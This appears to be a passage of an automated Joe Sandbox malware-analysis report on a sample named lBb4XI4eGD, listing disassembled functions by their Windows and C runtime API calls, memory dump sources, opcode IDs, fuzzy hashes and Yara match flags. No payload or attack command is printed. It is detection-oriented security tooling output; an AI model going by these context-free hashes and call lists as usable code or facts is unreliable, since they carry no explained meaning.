                                                                                                                                                                                                                                • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                • Instruction ID: 8f609bbaab28dcd4c6f930bf66982c62409db2f0a0890d2e04fd992d75910c1f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 541140B6950108BFCB01EF95C941DD93FB6EF84350B5185A5FA188B271DB31EB60AF90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431DEA
                                                                                                                                                                                                                                  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431DF6
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E01
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E0C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E17
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E22
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E2D
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E38
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E43
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                • Instruction ID: 87776794b7e7eece0f25d73b1b75ae69850b50dc626e3fc0762df5fa29964573
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9011A776500108BFDB02EF55C852CD93B65EF18356F0190AAF9184B232DA35DF519F88
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __cftoe
                                                                                                                                                                                                                                • String ID: <(@$<(@
                                                                                                                                                                                                                                • API String ID: 4189289331-1745028333
                                                                                                                                                                                                                                • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                • Instruction ID: dd19a4b5401c40ac365bd4b6466f4abdac11a3aecfb9adebaa38ddcec4c103bf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18512C32A00111EBDB149B5BEC41EAB77ADEF49325F90415FF81592282DB39D900866D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044017F), ref: 0043EEB5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DecodePointer
                                                                                                                                                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                • Opcode ID: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                                                                                                                                                                                • Instruction ID: 29b0adf4cd4a19bf6d80e559d7e92663f8e6ec8767138eee3bf00a563bc4ae44
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4851A07090150ADBCF14DFA9E9481AEBBB0FB0D300F2551A7D480A62A5C7B99D29CB1E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                • Instruction ID: cc57809314bc7937693eaec863d437f20a77c0842d17f9a0185220fb5c7a6979
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EC11674E84349AFCF16DFA8C844BAEBBB1AF89310F0441E5E525A7392D7309941DF61
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D00
                                                                                                                                                                                                                                • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D19
                                                                                                                                                                                                                                • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D20
                                                                                                                                                                                                                                • PMDtoOffset.LIBCMT ref: 00428D3F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                • Opcode ID: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
                                                                                                                                                                                                                                • Instruction ID: f58e39392761fe45c588d51cd7f0347041c183eb1b6093b38bd943e8a3a40f23
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16214972B022259FDB04DF65FD02AAE77A4EF54714B50411FF900932C1DF38E90586A9
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • atomic_compare_exchange.LIBCONCRT ref: 0215C6CC
                                                                                                                                                                                                                                • atomic_compare_exchange.LIBCONCRT ref: 0215C6F0
                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0215C701
                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0215C70F
                                                                                                                                                                                                                                  • Part of subcall function 02141370: __Mtx_unlock.LIBCPMT ref: 02141377
                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0215C71F
                                                                                                                                                                                                                                  • Part of subcall function 0215C3DF: __Cnd_broadcast.LIBCPMT ref: 0215C3E6
                                                                                                                                                                                                                                • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0215C72D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                                                                                                                                                • String ID: d#D
                                                                                                                                                                                                                                • API String ID: 4258476935-2139572230
                                                                                                                                                                                                                                • Opcode ID: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
                                                                                                                                                                                                                                • Instruction ID: edd11d95761eb81274123a4b84b13000968e5d42aaf35eb5228e62c50b032e6f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A801F775980615EFCB20BB608D84B9E735BAF04360F100051ED2557680EBB8EB158ED1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D928,0042D928,?,?,?,00432375,00000001,00000001,23E85006), ref: 0043217E
                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 004321B6
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432375,00000001,00000001,23E85006,?,?,?), ref: 00432204
                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0043229B
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004322FE
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0043230B
                                                                                                                                                                                                                                  • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00432314
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00432339
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3864826663-0
                                                                                                                                                                                                                                • Opcode ID: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                                                                                                                                                                                                • Instruction ID: ba832ad7ebe863b589d8a86c2aeb799e0d63014e0688505fe86a97fbdbb1aa79
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA51F572600216AFDB249F71DD41EAF77A9EB48754F14462AFD04E7240DBBCDC408668
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02172131: GetLastError.KERNEL32(?,?,0216A9DC,?,00000000,?,0216CDD6,02142474,00000000,?,00451F20), ref: 02172135
                                                                                                                                                                                                                                  • Part of subcall function 02172131: _free.LIBCMT ref: 02172168
                                                                                                                                                                                                                                  • Part of subcall function 02172131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021721A9
                                                                                                                                                                                                                                • _free.LIBCMT ref: 02171434
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217144D
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217147F
                                                                                                                                                                                                                                • _free.LIBCMT ref: 02171488
                                                                                                                                                                                                                                • _free.LIBCMT ref: 02171494
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorLast
                                                                                                                                                                                                                                • String ID: C
                                                                                                                                                                                                                                • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                • Instruction ID: 5a46427a6990f84896730cf3369290b4f229375ea6751352a68fad15a9c4ec26
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6B11875A41219AFDB24DF28C884BADB7B5FB88314F1445EAD94EA7350D731AE90CF80
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                • Instruction ID: e269845c62e055ed85ea51f154ecb0151b9bd51cbd05d171fe02e5d11d3c11e8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A61E271D80205AFDB20DF68C841B9EBBF5EF85720F2441AAE954EB351D731A941DB90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                • Instruction ID: 375e79c53d3bcaca8bdb11d34ea16f93cbcffeb35ab56cd023e7f34feda17694
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2361F271D00205AFEB20DF69C842B9ABBF4EF0D710F14516BE888EB382E7759D418B59
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(?,0216C494,E0830C40,?,?,?,?,?,?,0217424F,0214E032,0216C494,?,0216C494,0216C494,0214E032), ref: 02173B1C
                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 02173B97
                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 02173BB2
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,0216C494,00000001,?,00000005,00000000,00000000), ref: 02173BD8
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,0217424F,00000000,?,?,?,?,?,?,?,?,?,0217424F,0214E032), ref: 02173BF7
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,0214E032,00000001,0217424F,00000000,?,?,?,?,?,?,?,?,?,0217424F,0214E032), ref: 02173C30
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                                                                • Opcode ID: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                                                                                                                                                                                • Instruction ID: e70828bb8c11e199e0b052dd1ec6a4d74c38164aa99782006e66799e870a04f4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5851D574D40209AFCB11CFA8D884BEEBBF5EF49700F14416AE965E7391D730AA81CB64
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(?,0042C22D,E0830C40,?,?,?,?,?,?,00433FE8,0040DDCB,0042C22D,?,0042C22D,0042C22D,0040DDCB), ref: 004338B5
                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 00433930
                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 0043394B
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,0042C22D,00000001,?,00000005,00000000,00000000), ref: 00433971
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 00433990
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,0040DDCB,00000001,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 004339C9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                                                                • Opcode ID: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                                                                                                                                                                                • Instruction ID: 0fd517cfdcf2aa173ba8fdea846c20396cfd97c89b6f08fd2475e7b61059f896
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7751C470E002099FCB20DFA8D845BEEBBF4EF09701F14412BE556E7291E774AA41CB69
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 004286EB
                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 004286F3
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00428781
                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004287AC
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00428801
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                • Instruction ID: 6873744b8b7164bb1b3b36c6b2f168add7434ae9e481f0ca892fbce792e2aca1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C411934B012289BCF10DF29DC45A9F7BB0AF80328F64815FE8145B392DB399D15CB99
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02164ABD
                                                                                                                                                                                                                                  • Part of subcall function 02164D8C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,021647F0), ref: 02164D9C
                                                                                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02164AD2
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02164AE1
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02164AEF
                                                                                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02164B65
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02164BA5
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02164BB3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3151764488-0
                                                                                                                                                                                                                                • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                                • Instruction ID: c6b60de3459908f9bec5baf49f84aa05b4a3d4e75375528ac160ae26fe1e881e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35313635A40215AFCF28EF68C888B7DB3BAFF44310F254569D815A7281DB70EA21CB94
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                • Instruction ID: 08b9172f525f07bda63e44c6034215a48a4578a313dc2f64c1fd8b39de5f1239
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1011E176584119BFDB242F7A9C08D6F3ABEEFC2B60B210624FC25D7240DB318901CAA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                • Instruction ID: 6d10875eadbb656c302b38412db81507454656e5ad58498e79d080ea23809695
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54110D72A04215BFDB202FB79C05F6B7A5CEF89725F20163BF815C7241DA38890587A9
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0217A321: _free.LIBCMT ref: 0217A34A
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A628
                                                                                                                                                                                                                                  • Part of subcall function 021736C1: HeapFree.KERNEL32(00000000,00000000,?,0217A34F,?,00000000,?,00000000,?,0217A5F3,?,00000007,?,?,0217A9E7,?), ref: 021736D7
                                                                                                                                                                                                                                  • Part of subcall function 021736C1: GetLastError.KERNEL32(?,?,0217A34F,?,00000000,?,00000000,?,0217A5F3,?,00000007,?,?,0217A9E7,?,?), ref: 021736E9
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A633
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A63E
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A692
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A69D
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A6A8
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A6B3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                • Instruction ID: 29405ccfda0aef027d0a39c588ce150c811be08921a378041fdfe3737d31a33e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F211F171984B04BEDA20BFB1CD45FCF77BEDF84700F804825B2A9A61A0DB65B5149E90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0043A0BA: _free.LIBCMT ref: 0043A0E3
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A3C1
                                                                                                                                                                                                                                  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A3CC
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A3D7
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A42B
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A436
